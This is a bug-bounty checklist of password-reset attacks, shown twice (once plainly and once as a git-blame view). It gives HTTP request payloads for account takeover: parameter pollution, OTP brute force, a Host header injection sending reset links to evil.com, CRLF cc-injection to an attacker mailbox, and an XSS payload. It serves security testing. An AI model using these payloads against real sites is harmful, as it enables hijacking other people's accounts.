AllAboutBugBounty/Checklist/Forgot Password.md

## Forgot Password Functionality

## Introduction
Some common bugs in the forgot password / reset password functionality

## How to exploit
1. Parameter pollution
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&email=hacker@mail.com
```

2. Bruteforce the OTP code
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&code=$123456$
```

3. Host header Injection
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com
```
to
```
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...

email=victim@mail.com
```
And the victim will receive the reset link with evil.com

4. Using separator in value of the parameter
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com,hacker@mail.com
```
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%20hacker@mail.com
```
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com|hacker@mail.com
```
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%00hacker@mail.com
```

5. No domain in value of the paramter
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim
```

6. No TLD in value of the parameter
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail
```

7. Using carbon copy
```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%0a%0dcc:hacker@mail.com
```

8. If there is JSON data in body requests, add comma
```
POST /newaccount HTTP/1.1
Host: target.com
...

{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
```

9. Find out how the tokens generate
- Generated based on TimeStamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user

10. Try Cross-Site Scripting (XSS) in the form

Sometimes the email is reflected in the forgot password page, try to use XSS payload
```
"<svg/onload=alert(1)>"@gmail.com
```
## References
* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`## Forgot Password Functionality`
Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00
Update structure each readme 2022-06-15 10:38:42 +00:00			`## Introduction`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`Some common bugs in the forgot password / reset password functionality`
Update structure each readme 2022-06-15 10:38:42 +00:00
			`## How to exploit`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`1. Parameter pollution`
Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com&email=hacker@mail.com`
			```

			`2. Bruteforce the OTP code`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com&code=$123456$`
			```

			`3. Host header Injection`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`to`
Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`Host: target.com`
			`X-Forwarded-Host: evil.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com`
			```
			`And the victim will receive the reset link with evil.com`

			`4. Using separator in value of the parameter`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com,hacker@mail.com`
			```
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com%20hacker@mail.com`
			```
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com\|hacker@mail.com`
			```
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com%00hacker@mail.com`
			```

			`5. No domain in value of the paramter`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim`
			```

			`6. No TLD in value of the parameter`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail`
			```

			`7. Using carbon copy`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /reset HTTP/1.1`
			`Host: target.com`
			`...`

Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			`email=victim@mail.com%0a%0dcc:hacker@mail.com`
			```

			`8. If there is JSON data in body requests, add comma`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /newaccount HTTP/1.1`
			`Host: target.com`
			`...`

Update structure each readme 2022-06-15 10:38:42 +00:00			`{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}`
Daffa / Split reset password and ATO 2021-01-31 15:03:29 +00:00			```

			`9. Find out how the tokens generate`
			`- Generated based on TimeStamp`
			`- Generated based on the ID of the user`
			`- Generated based on the email of the user`
			`- Generated based on the name of the user`
Update structure each readme 2022-06-15 10:38:42 +00:00
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`10. Try Cross-Site Scripting (XSS) in the form`

			`Sometimes the email is reflected in the forgot password page, try to use XSS payload`
			```
			`"<svg/onload=alert(1)>"@gmail.com`
			```
Update structure each readme 2022-06-15 10:38:42 +00:00			`## References`
			`* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)`
			`* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)`